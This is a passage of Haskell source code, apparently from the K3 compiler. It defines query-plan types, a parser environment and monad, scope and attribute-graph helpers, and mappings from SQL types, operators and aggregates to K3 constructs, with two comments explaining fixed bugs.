                           , pcgroupbys :: ScalarExprList
                           , pcprojects :: SelectItemList
                           , pcaggregates :: SelectItemList
                           , pchaving :: MaybeBoolExpr
                           , pcbindings :: SubqueryBindings }
               deriving (Eq, Show)
-- | A node of the relational plan tree: a join (with processing/output
--   scopes, optional join type, equality and general predicates, predicate
--   subquery bindings, and a post-join chain), a nested subquery, or a base
--   table (with an optional table reference, binding map, and chain).
data PlanNode = PJoin { pnjprocsid :: ScopeId
                      , pnjoutsid :: ScopeId
                      , pnjtype :: Maybe (Natural, JoinType)
                      , pnjequalities :: [(ScalarExpr, ScalarExpr)]
                      , pnjpredicates :: ScalarExprList
                      , pnjpredbinds :: SubqueryBindings
                      , pnjpath :: [PlanCPath] }
              | PSubquery { pnsqoutsid :: ScopeId
                          , pnqclosure :: QueryClosure }
              | PTable { pntid :: Identifier
                       , pntoutsid :: ScopeId
                       , pntref :: Maybe TableRef
                       , pntbindmap :: Maybe BindingMap
                       , pntpath :: [PlanCPath] }
              deriving (Eq, Show)

-- | A plan tree of join/subquery/table nodes.
type PlanTree = Tree PlanNode

-- | A full query plan: an optional join tree, a top-level chain of
--   select/project/aggregate stages, and an optional stage identifier.
data QueryPlan = QueryPlan { qjoinTree :: Maybe PlanTree
                           , qpath :: [PlanCPath]
                           , qstageid :: Maybe Identifier }
               deriving (Eq, Show)

-- | A record-label prefix used when mapping attributes into K3 records.
type TypePrefix = Identifier

-- | A nested field path within a K3 record type.
type TypePath = [Identifier]

-- | How an attribute maps onto a K3 type: via a prefix or a field path.
type TypeMapping = Maybe (Either TypePrefix TypePath)

-- | How scope attributes bind to the fields of a concrete K3 value:
--   directly, under a common prefix, via per-attribute field paths, or via
--   a per-attribute (variable, mapping) partition.
data BindingMap = BMNone
                | BMTPrefix Identifier
                | BMTFieldMap (Map Identifier TypePath)
                | BMTVPartition (Map Identifier (Identifier, TypeMapping))
                deriving (Eq, Show)
-- | Parser state: relation types, the attribute dependency graph, scope
--   frames, and independent symbol generators for aliases, graph pointers,
--   scopes, subqueries, stages, labels and aggregates.
data SQLEnv = SQLEnv { relations :: RTypeEnv
                     , adgraph :: ADGraph
                     , scopeenv :: ScopeEnv
                     , aliassym :: ParGenSymS
                     , adpsym :: ParGenSymS
                     , spsym :: ParGenSymS
                     , sqsym :: ParGenSymS
                     , stgsym :: ParGenSymS
                     , slblsym :: ParGenSymS
                     , aggdsym :: ParGenSymS }
            deriving (Eq, Show)

-- | The parsing monad: String errors over SQLEnv state.
type SQLParseM = ExceptT String (State SQLEnv)

-- | Declarations produced by SQL translation: relation schemas, staging
--   collections, and query plans.
data SQLDecl = SQLRel (Identifier, K3 Type)
             | SQLStage (Identifier, K3 Type)
             | SQLQuery QueryPlan
             deriving (Eq, Show)

-- | Stage dependency graph: a source stage, or an edge between two stages.
type StageGraph = [Either Identifier (Identifier, Identifier)]
-- | Name of the materialized output collection for the given identifier.
materializeId :: Identifier -> Identifier
materializeId = ("output" ++)

-- | Name of the staging entity for the given identifier.
stageId :: Identifier -> Identifier
stageId = ("stage" ++)
-- | Strip any existing mutability qualifiers and mark the type immutable.
immutT :: K3 Type -> K3 Type
immutT t = t @<- (filter (not . isTQualified) (annotations t) ++ [TImmutable])

-- | Strip any existing mutability qualifiers and mark the type mutable.
mutT :: K3 Type -> K3 Type
mutT t = t @<- (filter (not . isTQualified) (annotations t) ++ [TMutable])

-- | Strip any existing mutability qualifiers and mark the expression immutable.
immutE :: K3 Expression -> K3 Expression
immutE e = e @<- (filter (not . isEQualified) (annotations e) ++ [EImmutable])

-- | Strip any existing mutability qualifiers and mark the expression mutable.
mutE :: K3 Expression -> K3 Expression
mutE e = e @<- (filter (not . isEQualified) (annotations e) ++ [EMutable])

-- | Build an immutable tuple expression; a singleton yields the bare element.
tupE :: [K3 Expression] -> K3 Expression
tupE exprs = case exprs of
  [e] -> immutE e
  el  -> EC.tuple (map immutE el)

-- | Build a record expression whose fields are all immutable.
recE :: [(Identifier, K3 Expression)] -> K3 Expression
recE ide = EC.record [ (i, immutE e) | (i, e) <- ide ]

-- | Build a record type whose fields are all immutable.
recT :: [(Identifier, K3 Type)] -> K3 Type
recT idt = TC.record [ (i, immutT t) | (i, t) <- idt ]
-- | Extract the element type of a K3 collection type.
telemM :: K3 Type -> SQLParseM (K3 Type)
telemM (tnc -> (TCollection, [t])) = return t
telemM t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t

-- | Wrap an element type as an immutable K3 @Collection@.
tcolM :: K3 Type -> SQLParseM (K3 Type)
tcolM t = return $ (TC.collection t) @<- [TAnnotation "Collection", TImmutable]

-- | Apply a SQL table alias to a record element type; a full alias (with
--   column names) renames every field, and must match the field count.
taliaselemM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliaselemM alias t@(tnc -> (TRecord ids, ch)) =
  case alias of
    NoAlias _ -> return t
    TableAlias _ _ -> return t
    FullAlias _ _ fnc | length fnc == length ids -> return $ recT $ zip (map sqlnmcomponent fnc) ch
    FullAlias _ _ _ -> throwE $ "Mismatched alias fields length"
taliaselemM _ t = throwE $ boxToString $ ["Invalid relation element type"] %$ prettyLines t

-- | As 'taliaselemM', but applied to the record element of a collection
--   type, preserving the collection's annotations.
taliascolM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliascolM alias t@(tnc -> (TCollection, [et@(tag -> TRecord _)])) =
  taliaselemM alias et >>= \net -> return $ (TC.collection net) @<- (annotations t)
taliascolM _ t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t
-- | Wraps a K3 record type with an 'elem' label.
-- | Wrap a record type as a single-field record labeled "elem".
twrapelemM :: K3 Type -> SQLParseM (K3 Type)
twrapelemM t@(tag -> TRecord _) = return $ recT [("elem", t)]
twrapelemM t = throwE $ boxToString $ ["Invalid element type for wrapping:"] %$ prettyLines t

-- | Wrap a collection's record element with an "elem" label, preserving
--   the collection's annotations.
twrapcolelemM :: K3 Type -> SQLParseM (K3 Type)
twrapcolelemM t@(tnc -> (TCollection, [et])) = twrapelemM et >>= \net -> return $ (TC.collection net) @<- annotations t
twrapcolelemM t = throwE $ boxToString $ ["Invalid collection type for wrapping:"] %$ prettyLines t
-- | Run a parse action, returning its result and the final environment.
runSQLParseM :: SQLEnv -> SQLParseM a -> (Either String a, SQLEnv)
runSQLParseM env m = flip runState env $ runExceptT m

-- | Run a parse action, pairing a successful result with the final
--   environment (errors discard the environment).
runSQLParseEM :: SQLEnv -> SQLParseM a -> Either String (a, SQLEnv)
runSQLParseEM env m = r >>= return . (,e)
  where (r,e) = runSQLParseM env m

-- | Run a parse action, discarding the final environment.
evalSQLParseM :: SQLEnv -> SQLParseM a -> Either String a
evalSQLParseM env m = fst $ runSQLParseM env m

-- | Transform any error raised by the given action with the supplied function.
reasonM :: (String -> String) -> SQLParseM a -> SQLParseM a
reasonM errf = mapExceptT $ \m -> m >>= \case
  Left err -> return $ Left $ errf err
  Right r -> return $ Right r

-- | Raise an error without transformation.
errorM :: String -> SQLParseM a
errorM msg = reasonM id $ throwE msg

-- | Lift a pure 'Except' computation into the parse monad.
liftExceptM :: Except String a -> SQLParseM a
liftExceptM = mapExceptT (return . runIdentity)

-- | Lift an 'Either' into the parse monad.
liftEitherM :: Either String a -> SQLParseM a
liftEitherM = either throwE return
-- | The empty parser environment, with fresh contiguous symbol generators.
sqlenv0 :: SQLEnv
sqlenv0 = SQLEnv Map.empty Map.empty Map.empty contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS

-- | Look up a relation's type by name.
srlkup :: RTypeEnv -> Identifier -> Except String (K3 Type)
srlkup env x = maybe err return $ Map.lookup x env
  where err = throwE $ "Unknown relation in sql parser environment: " ++ show x

-- | Register (or overwrite) a relation's type.
srext :: RTypeEnv -> Identifier -> K3 Type -> RTypeEnv
srext env x t = Map.insert x t env

-- | Remove a relation from the environment.
srdel :: RTypeEnv -> Identifier -> RTypeEnv
srdel env x = Map.delete x env

-- | Look up an attribute dependency graph node by pointer.
sglkup :: ADGraph -> ADGPtr -> Except String ADGNode
sglkup g p = maybe err return $ Map.lookup p g
  where err = throwE $ "Unknown attribute node in sql parser environment: " ++ show p

-- | Insert a node into the graph under a freshly generated pointer.
sgext :: ADGraph -> ADGNode -> ParGenSymS -> (ADGPtr, ParGenSymS, ADGraph)
sgext g n sym = (ptr, nsym, Map.insert ptr n g)
  where (nsym, ptr) = gensym sym

-- | Look up an attribute path in a scope frame, failing if absent.
sflkup :: ScopeFrame -> [Identifier] -> Except String ADGPtr
sflkup (fr,_,_) path = maybe err return $ Map.lookup path fr
  where err = throwE $ unwords ["Invalid scope path:", show path, "in", show fr]

-- | Non-failing variant of 'sflkup'.
sftrylkup :: ScopeFrame -> [Identifier] -> Maybe ADGPtr
sftrylkup (fr,_,_) path = Map.lookup path fr

-- | All graph pointers of a frame, in attribute order.
sfptrs :: ScopeFrame -> Except String [ADGPtr]
sfptrs sf@(fr, ord, _) = mapM (\p -> sflkup sf p) ord

-- | Add a binding to a frame, appending it to the attribute order and
--   recording a new qualifier prefix if the path is qualified.
sfpush :: ScopeFrame -> [Identifier] -> ADGPtr -> ScopeFrame
sfpush (fr,ord,q) path ptr = (Map.insert path ptr fr, ord ++ [path], nq)
  where nq = if length path > 1 then (if init path `notElem` q then q ++ [init path] else q) else q
-- | Remove an attribute path from a scope frame, returning the evicted
--   graph pointer (if any) together with the updated frame. Qualifiers
--   that no longer prefix any remaining attribute are dropped.
sfpop :: ScopeFrame -> [Identifier] -> (Maybe ADGPtr, ScopeFrame)
-- BUG FIX: the attribute order previously used @filter (== path) ord@,
-- which kept ONLY the popped path and discarded every other attribute.
-- Popping must remove the popped path and retain the rest.
sfpop (fr,ord,q) path = (npopt, (nfr, filter (/= path) ord, newq))
  where (npopt, nfr) = Map.updateLookupWithKey (\_ _ -> Nothing) path fr
        -- Recompute the qualifier prefixes still present in the frame.
        newquals = filter (not . null) $ map (\p -> if length p > 1 then init p else []) $ Map.keys nfr
        newq = filter (`elem` newquals) q
-- | Look up a scope frame by id.
sclkup :: ScopeEnv -> ScopeId -> Except String ScopeFrame
sclkup env p = maybe err return $ Map.lookup p env
  where err = throwE $ "Unknown scope: " ++ show p

-- | Register a frame under a freshly generated scope id.
scpush :: ScopeEnv -> ScopeFrame -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scpush env fr sym = (ptr, nsym, Map.insert ptr fr env)
  where (nsym, ptr) = gensym sym

-- | Remove and return the most recently registered (maximal id) frame.
scpop :: ScopeEnv -> (Maybe ScopeFrame, ScopeEnv)
scpop env = if Map.null env then (Nothing, env) else (Just fr, Map.delete sp env)
  where (sp, fr) = Map.findMax env

-- | Look up an attribute path within a given scope.
scflkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
scflkup env sp path = sclkup env sp >>= \fr -> sflkup fr path

-- | Non-failing attribute lookup within a given scope.
scftrylkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
scftrylkup env sp path = sclkup env sp >>= \fr -> return $ sftrylkup fr path

-- | All graph pointers of a scope, in attribute order.
scfptrs :: ScopeEnv -> ScopeId -> Except String [ADGPtr]
scfptrs env sp = sclkup env sp >>= sfptrs

-- | Add a binding to the innermost frame, creating a singleton frame (and
--   scope) when the environment is empty.
scfpush :: ScopeEnv -> [Identifier] -> ADGPtr -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scfpush env path np sym = if Map.null env then scpush env (Map.singleton path np, [path], pathqual) sym
                                          else (sp, sym, Map.insert sp (sfpush fr path np) env)
  where (sp,fr) = Map.findMax env
        pathqual = if length path > 1 then [init path] else []

-- | Remove a binding from the innermost frame, if the environment is non-empty.
scfpop :: ScopeEnv -> [Identifier] -> (Maybe ADGPtr, ScopeEnv)
scfpop env path = if Map.null env then (Nothing, env) else (npopt, Map.insert sp nfr env)
  where (sp, fr) = Map.findMax env
        (npopt, nfr) = sfpop fr path
-- Pure SQLEnv steppers: each draws a fresh symbol from one of the
-- environment's generators, or delegates to the corresponding relation /
-- graph / scope primitive, threading the updated environment.

-- | Fresh alias symbol.
sasext :: SQLEnv -> (Int, SQLEnv)
sasext senv = (n, senv {aliassym = nsym})
  where (nsym, n) = gensym (aliassym senv)

-- | Fresh stage symbol.
stgsext :: SQLEnv -> (Int, SQLEnv)
stgsext senv = (n, senv {stgsym = nsym})
  where (nsym, n) = gensym (stgsym senv)

-- | Fresh subquery symbol.
ssqsext :: SQLEnv -> (Int, SQLEnv)
ssqsext senv = (n, senv {sqsym = nsym})
  where (nsym, n) = gensym (sqsym senv)

-- | Fresh label symbol.
slblsext :: SQLEnv -> (Int, SQLEnv)
slblsext senv = (n, senv {slblsym = nsym})
  where (nsym, n) = gensym (slblsym senv)

-- | Fresh aggregate symbol.
saggsext :: SQLEnv -> (Int, SQLEnv)
saggsext senv = (n, senv {aggdsym = nsym})
  where (nsym, n) = gensym (aggdsym senv)

-- | Relation lookup/extension/deletion on the environment.
sqrlkup :: SQLEnv -> Identifier -> Except String (K3 Type)
sqrlkup senv n = srlkup (relations senv) n

sqrext :: SQLEnv -> Identifier -> K3 Type -> SQLEnv
sqrext senv n t = senv { relations = srext (relations senv) n t }

sqrdel :: SQLEnv -> Identifier -> SQLEnv
sqrdel senv n = senv { relations = srdel (relations senv) n }

-- | Attribute graph lookup/extension on the environment.
sqglkup :: SQLEnv -> ADGPtr -> Except String ADGNode
sqglkup senv p = sglkup (adgraph senv) p

sqgext :: SQLEnv -> ADGNode -> (ADGPtr, SQLEnv)
sqgext senv n = (ptr, senv {adgraph = ng, adpsym = nsym})
  where (ptr, nsym, ng) = sgext (adgraph senv) n (adpsym senv)

-- | Scope environment operations on the environment.
sqclkup :: SQLEnv -> ScopeId -> Except String ScopeFrame
sqclkup env p = sclkup (scopeenv env) p

sqcpush :: SQLEnv -> ScopeFrame -> (ScopeId, SQLEnv)
sqcpush env fr = (nsp, env {scopeenv = nenv, spsym = nsym})
  where (nsp, nsym, nenv) = scpush (scopeenv env) fr (spsym env)

sqcpop :: SQLEnv -> (Maybe ScopeFrame, SQLEnv)
sqcpop env = (fropt, env { scopeenv = nsenv })
  where (fropt, nsenv) = scpop (scopeenv env)

sqcflkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
sqcflkup env sp path = scflkup (scopeenv env) sp path

sqcftrylkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
sqcftrylkup env sp path = scftrylkup (scopeenv env) sp path

sqcfptrs :: SQLEnv -> ScopeId -> Except String [ADGPtr]
sqcfptrs env sp = scfptrs (scopeenv env) sp

sqcfpush :: SQLEnv -> [Identifier] -> ADGPtr -> (ScopeId, SQLEnv)
sqcfpush env path np = (nsp, env {scopeenv = nsenv, spsym = nsym})
  where (nsp, nsym, nsenv) = scfpush (scopeenv env) path np (spsym env)

sqcfpop :: SQLEnv -> [Identifier] -> (Maybe ADGPtr, SQLEnv)
sqcfpop env path = (npopt, env {scopeenv = nsenv})
  where (npopt, nsenv) = scfpop (scopeenv env) path
-- | Monadic accessors.
-- Monadic wrappers over the pure environment steppers above: each reads
-- the state, applies the corresponding pure operation, writes back the
-- updated environment, and returns the result.

sqrlkupM :: Identifier -> SQLParseM (K3 Type)
sqrlkupM n = get >>= liftExceptM . (\env -> sqrlkup env n)

sqrextM :: Identifier -> K3 Type -> SQLParseM ()
sqrextM n t = get >>= \env -> return (sqrext env n t) >>= put

sqglkupM :: ADGPtr -> SQLParseM ADGNode
sqglkupM p = get >>= liftExceptM . (\env -> sqglkup env p)

sqgextM :: ADGNode -> SQLParseM ADGPtr
sqgextM n = get >>= \env -> return (sqgext env n) >>= \(r, nenv) -> put nenv >> return r

sqclkupM :: ScopeId -> SQLParseM ScopeFrame
sqclkupM sp = get >>= liftExceptM . (\env -> sqclkup env sp)

sqcpushM :: ScopeFrame -> SQLParseM ScopeId
sqcpushM fr = get >>= \env -> return (sqcpush env fr) >>= \(r, nenv) -> put nenv >> return r

sqcpopM :: SQLParseM (Maybe ScopeFrame)
sqcpopM = get >>= \env -> return (sqcpop env) >>= \(r, nenv) -> put nenv >> return r

sqcflkupM :: ScopeId -> [Identifier] -> SQLParseM ADGPtr
sqcflkupM sp path = get >>= liftExceptM . (\env -> sqcflkup env sp path)

sqcftrylkupM :: ScopeId -> [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcftrylkupM sp path = get >>= liftExceptM . (\env -> sqcftrylkup env sp path)

sqcfptrsM :: ScopeId -> SQLParseM [ADGPtr]
sqcfptrsM sp = get >>= liftExceptM . (\env -> sqcfptrs env sp)

sqcfpushM :: [Identifier] -> ADGPtr -> SQLParseM ScopeId
sqcfpushM path np = get >>= \env -> return (sqcfpush env path np) >>= \(r, nenv) -> put nenv >> return r

sqcfpopM :: [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcfpopM path = get >>= \env -> return (sqcfpop env path) >>= \(r, nenv) -> put nenv >> return r

-- Fresh-symbol accessors.
sasextM :: SQLParseM Int
sasextM = get >>= \env -> return (sasext env) >>= \(i, nenv) -> put nenv >> return i

stgsextM :: SQLParseM Int
stgsextM = get >>= \env -> return (stgsext env) >>= \(i, nenv) -> put nenv >> return i

ssqsextM :: SQLParseM Int
ssqsextM = get >>= \env -> return (ssqsext env) >>= \(i, nenv) -> put nenv >> return i

slblsextM :: SQLParseM Int
slblsextM = get >>= \env -> return (slblsext env) >>= \(i, nenv) -> put nenv >> return i

saggsextM :: SQLParseM Int
saggsextM = get >>= \env -> return (saggsext env) >>= \(i, nenv) -> put nenv >> return i
-- | Push a new scope binding each attribute both unqualified and under the
--   given qualifier, all pointing at the supplied graph nodes.
sqgextScopeM :: Identifier -> [Identifier] -> [ADGPtr] -> SQLParseM ScopeId
sqgextScopeM qualifier ids ptrs = do
    let paths = map (:[]) ids
    let qpaths = map (\i -> [qualifier,i]) ids
    sqcpushM (Map.fromList $ zip paths ptrs ++ zip qpaths ptrs, paths, [[qualifier]])

-- | Extend the attribute graph with source nodes for a named relation's
--   record fields, and push a scope over them.
sqgextSchemaM :: Maybe Identifier -> K3 Type -> SQLParseM ScopeId
sqgextSchemaM (Just n) t = do
    rt <- telemM t
    case tnc rt of
      (TRecord ids, ch) -> do
        ptrs <- mapM sqgextM $ map (\(i, ct) -> ADGNode i ct (Just n) Nothing []) $ zip ids ch
        sqgextScopeM n ids ptrs
      _ -> throwE $ boxToString $ ["Invalid relational element type"] %$ prettyLines rt

sqgextSchemaM _ _ = throwE "No relation name specified when extending attribute graph"

-- | Extend the attribute graph with alias nodes, each referencing a source
--   node by an identifier expression, and push a scope over them.
sqgextAliasM :: Maybe Identifier -> K3 Type -> [ADGPtr] -> SQLParseM ScopeId
sqgextAliasM (Just n) t srcptrs = do
    rt <- telemM t
    case tag rt of
      TRecord dstids | length dstids == length srcptrs -> do
        destnodes <- mapM mknode $ zip dstids srcptrs
        destptrs <- mapM sqgextM destnodes
        sqgextScopeM n dstids destptrs
      _ -> throwE $ boxToString $ ["Invalid alias type when extending attribute graph"] %$ prettyLines rt

  where mknode (d, ptr) = do
          node <- sqglkupM ptr
          return $ ADGNode d (adnt node) (Just n) (Just $ Identifier emptyAnnotation $ Nmc $ adnn node) [ptr]

sqgextAliasM _ _ _ = throwE "Invalid alias arguments when extending attribute graph"

-- | Extend the attribute graph with computed-attribute nodes, deriving each
--   node's dependencies from its defining expression in the given scope.
sqgextExprM :: ScopeId -> Maybe Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
sqgextExprM sid (Just n) exprs = do
    nodes <- mapM mknode exprs
    ptrs <- mapM sqgextM nodes
    sqgextScopeM n (map (\(i,_,_) -> i) exprs) ptrs

  where mknode (i, t, e) = do
          eptrs <- exprAttrs sid e
          return $ ADGNode i t (Just n) (Just e) eptrs

sqgextExprM _ _ _ = throwE "Invalid expr arguments when extending attribute graph"
-- | Translate a SQL table definition into a K3 collection-of-records type.
sqltabletype :: AttributeDefList -> SQLParseM (K3 Type)
sqltabletype attrs = sqlrectype attrs >>= tcolM

-- | Translate a SQL attribute list into a K3 record type.
sqlrectype :: AttributeDefList -> SQLParseM (K3 Type)
sqlrectype attrs = mapM sqlattr attrs >>= \ts -> return (recT ts)

-- | Translate a single attribute definition into a named K3 type.
sqlattr :: AttributeDef -> SQLParseM (Identifier, K3 Type)
sqlattr (AttributeDef _ nm t _ _) = sqlnamedtype t >>= return . (sqlnmcomponent nm,)

-- | Translate a SQL base type name (with optional precision arguments)
--   into a K3 type; dates and sized varchars carry property annotations.
sqltype :: String -> Maybe Int -> Maybe Int -> SQLParseM (K3 Type)
sqltype s lpOpt uOpt = case s of
  "int" -> return TC.int
  "integer" -> return TC.int
  "real" -> return TC.real
  "double precision" -> return TC.real
  "text" -> return TC.string
  "varchar" -> return $ maybe TC.string (\i -> TC.string @+ TProperty (Left $ "TPCHVarchar_" ++ show i)) lpOpt
  "date" -> return $ TC.int @+ TProperty (Left "TPCHDate")
  _ -> throwE $ "Invalid K3-SQL type: " ++ s

-- | Translate a structured SQL type name (arrays, sets, precision forms).
sqlnamedtype :: TypeName -> SQLParseM (K3 Type)
sqlnamedtype tn = case tn of
  ArrayTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Vector"
  Prec2TypeName _ s l u -> sqltype s (Just $ fromInteger l) (Just $ fromInteger u)
  PrecTypeName _ s p -> sqltype s (Just $ fromInteger p) Nothing
  SetOfTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Set"
  SimpleTypeName _ s -> sqltype s Nothing Nothing
-- | Flatten a (possibly multi-component) SQL name into a single string.
sqlnm :: Name -> String
sqlnm (Name _ comps) = foldMap sqlnmcomponent comps

-- | Extract the raw string of a name component (quoted or not).
sqlnmcomponent :: NameComponent -> String
sqlnmcomponent nc = case nc of
  Nmc s  -> s
  QNmc s -> s

-- | Stringify every component of a name path.
sqlnmpath :: [NameComponent] -> [String]
sqlnmpath = map sqlnmcomponent

-- | Resolve a table alias to a qualifier: the default name when no alias
--   is given, otherwise the alias prefixed with "__".
sqltablealias :: Identifier -> TableAlias -> Maybe Identifier
sqltablealias def alias = Just $ case alias of
  NoAlias _        -> def
  TableAlias _ nc  -> "__" ++ sqlnmcomponent nc
  FullAlias _ nc _ -> "__" ++ sqlnmcomponent nc
-- | Map a SQL operator name and argument list onto a K3 operator
--   application. Returns Nothing for names that are not simple
--   unary/binary operators.
sqloperator :: String -> ScalarExprList -> Maybe OperatorFn
sqloperator "-"    [x]   = Just (UnaryOp ONeg x)
sqloperator "!not" [x]   = Just (UnaryOp ONot x)
sqloperator "+"    [x,y] = Just (BinaryOp OAdd x y)
sqloperator "-"    [x,y] = Just (BinaryOp OSub x y)
sqloperator "*"    [x,y] = Just (BinaryOp OMul x y)
sqloperator "/"    [x,y] = Just (BinaryOp ODiv x y)
sqloperator "%"    [x,y] = Just (BinaryOp OMod x y)
sqloperator "="    [x,y] = Just (BinaryOp OEqu x y)
sqloperator "!="   [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<>"   [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<"    [x,y] = Just (BinaryOp OLth x y)
-- BUG FIX: "<=" previously mapped to OGeq (greater-or-equal), silently
-- inverting every <= comparison; it must map to OLeq.
sqloperator "<="   [x,y] = Just (BinaryOp OLeq x y)
sqloperator ">"    [x,y] = Just (BinaryOp OGth x y)
sqloperator ">="   [x,y] = Just (BinaryOp OGeq x y)
sqloperator "!and" [x,y] = Just (BinaryOp OAnd x y)
sqloperator "!or"  [x,y] = Just (BinaryOp OOr x y)
sqloperator _ _ = Nothing
-- | The scalar expression underlying each select item.
projectionexprs :: SelectItemList -> ScalarExprList
projectionexprs = map projectionexpr

-- | The scalar expression underlying a select item, named or not.
projectionexpr :: SelectItem -> ScalarExpr
projectionexpr si = case si of
  SelExp _ e       -> e
  SelectItem _ e _ -> e

-- | Wrap a scalar expression as an unnamed select item.
mkprojection :: ScalarExpr -> SelectItem
mkprojection = SelExp emptyAnnotation
-- | Split a list of aggregate select items into their argument expressions
--   and aggregate function tags.
aggregateexprs :: SelectItemList -> SQLParseM (ScalarExprList, [AggregateFn])
aggregateexprs sl = mapM aggregateexpr sl >>= return . unzip

-- | Recognize a select item as a single-argument sum/count/min/max call.
aggregateexpr :: SelectItem -> SQLParseM (ScalarExpr, AggregateFn)
aggregateexpr (projectionexpr -> e) = case e of
  FunCall _ nm args -> do
    let fn = sqlnm nm
    case (fn, args) of
      ("sum"  , [e']) -> return (e', AggSum)
      ("count", [e']) -> return (e', AggCount)
      ("min"  , [e']) -> return (e', AggMin)
      ("max"  , [e']) -> return (e', AggMax)
      (_, _) -> throwE $ "Invalid aggregate expression: " ++ show e
  _ -> throwE $ "Invalid aggregate expression: " ++ show e

-- | Rebuild an aggregate select item from a function tag and argument,
--   preserving the original item's output name (if any).
mkaggregate :: AggregateFn -> SelectItem -> ScalarExpr -> SQLParseM SelectItem
mkaggregate fn agg e = case fn of
    AggSum   -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "sum"]) [e]
    AggCount -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "count"]) [e]
    AggMin   -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "min"]) [e]
    AggMax   -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "max"]) [e]
  where rt (SelExp _ _) e' = return (SelExp emptyAnnotation e')
        rt (SelectItem _ _ nmc) e' = return (SelectItem emptyAnnotation e' nmc)

-- | True when the expression is a single-argument sum/count/min/max call.
isAggregate :: ScalarExpr -> SQLParseM Bool
isAggregate (FunCall _ nm args) = do
  let fn = sqlnm nm
  case (fn, args) of
    ("sum"  , [_]) -> return True
    ("count", [_]) -> return True
    ("min"  , [_]) -> return True
    ("max"  , [_]) -> return True
    (_, _) -> return False

isAggregate _ = return False
-- TODO: qualified identifiers, more expression types.
-- | Substitute identifiers for expressions within a scalar expression.
--   Only unqualified identifiers and function-call arguments are rewritten;
--   qualified identifiers are rejected, everything else passes through.
substituteExpr :: [(Identifier, ScalarExpr)] -> ScalarExpr -> SQLParseM ScalarExpr
substituteExpr bindings e = case e of
  (Identifier _ (sqlnmcomponent -> i)) -> return $ maybe e id $ lookup i bindings
  (QIdentifier _ _) -> throwE "Cannot substitute qualified expressions."
  (FunCall ann nm args) -> mapM (substituteExpr bindings) args >>= \nargs -> return $ FunCall ann nm nargs
  _ -> return e
-- | The attribute names of every node bound in an attribute environment.
attrIds :: AttrEnv -> SQLParseM [Identifier]
attrIds env = mapM (\ptr -> adnn <$> sqglkupM ptr) $ Map.elems env

-- | Require a path to be a single unqualified identifier.
singletonPath :: AttrPath -> SQLParseM Identifier
singletonPath [i] = return i
singletonPath p = throwE $ "Invalid singleton path: " ++ show p

-- | The single relation qualifier of a scope, failing if it is ambiguous.
uniqueScopeQualifier :: ScopeId -> SQLParseM Identifier
uniqueScopeQualifier sid = do
  (_, _, quals) <- sqclkupM sid
  case quals of
    [[q]] -> return q
    _ -> throwE $ "Invalid unique scope qualifier: " ++ show quals

-- | The unqualified attribute names of a frame, in order.
unqualifiedAttrs :: ScopeFrame -> SQLParseM [Identifier]
unqualifiedAttrs (_, ord, _) = forM ord $ singletonPath

-- | The bindings of a frame under the given qualifier prefix.
qualifiedAttrs :: AttrPath -> ScopeFrame -> SQLParseM AttrEnv
qualifiedAttrs prefix (fr, _, q)
  | prefix `elem` q = return $ Map.filterWithKey (\path _ -> prefix `isPrefixOf` path) fr
  | otherwise = throwE $ unwords ["Could not find qualifier:", show prefix, "(", show q, ")"]
-- | Split a frame's bindings into (unqualified, qualified) environments.
partitionAttrEnv :: ScopeFrame -> SQLParseM (AttrEnv, AttrEnv)
partitionAttrEnv (fr,_,_) = return $ Map.partitionWithKey (\path _ -> length path <= 1) fr

-- | Group qualified bindings by qualifier, keeping only attributes that
--   also appear unqualified in the frame's order (i.e. common attributes).
partitionCommonQualifedAttrEnv :: ScopeFrame -> SQLParseM (Map AttrPath AttrEnv)
partitionCommonQualifedAttrEnv (fr, ord, _) = return $ Map.foldlWithKey (addQualifiedCommon ord) Map.empty fr
  where
    addQualifiedCommon commons acc path ptr
      | length path <= 1 = acc
      | otherwise =
          let (qual, attr) = (init path, last path) in
          if [attr] `notElem` commons then acc else Map.alter (inject [attr] ptr) qual acc

    inject path ptr Nothing = Just $ Map.singleton path ptr
    inject path ptr (Just aenv) = Just $ Map.insert path ptr aenv

-- | Restrict a frame to its unqualified bindings; fails if the order
--   contains any qualified path (the ordering would be lossy).
unqualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
unqualifiedScopeFrame (fr, ord, _)
  | all (\path -> length path == 1) ord = return (Map.filterWithKey (\path _ -> length path == 1) fr, ord, [])
  | otherwise = throwE "Unable to extract unqualified scope (lossy order specification)"

-- | Restrict a frame to its qualified bindings (order discarded).
qualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
qualifiedScopeFrame (fr, _, q) = return (Map.filterWithKey (\path _ -> length path > 1) fr, [], q)

-- | Requalify all of a frame's unqualified bindings under a new name.
renameScopeFrame :: Identifier -> ScopeFrame -> SQLParseM ScopeFrame
renameScopeFrame i sf = do
  (ufr, ord, _) <- unqualifiedScopeFrame sf
  return (ufr <> Map.mapKeys (\path -> [i] ++ path) ufr, ord, [[i]])

-- | Concatenate two frames, unioning bindings and appending orders.
concatScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
concatScopeFrames (lfr,lord,lq) (rfr,rord,rq) = return (lfr <> rfr, lord ++ rord, lq++rq)
